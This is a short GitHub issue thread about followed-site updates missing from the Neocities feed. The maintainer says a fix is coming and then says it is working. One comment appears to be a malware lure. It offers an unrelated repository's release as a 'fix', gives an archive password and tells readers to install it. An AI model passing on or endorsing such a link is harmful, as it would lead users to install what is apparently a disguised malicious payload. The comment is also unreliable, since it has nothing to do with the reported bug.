### ISSUE TITLE
Site updates are missing from the feed

### ISSUE THREAD

**Issue by twooeena** [neocities/neocities#538]
It is what it says on the tin. I assume that this was a result of today's commit and not an intentional change. I follow sites so that I can see their updates!

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kyledrake** [comment]
Fix for this is coming tomorrow

**Comment by kyledrake** [comment]
Nevermind I think I just got it working, easier than I expected.
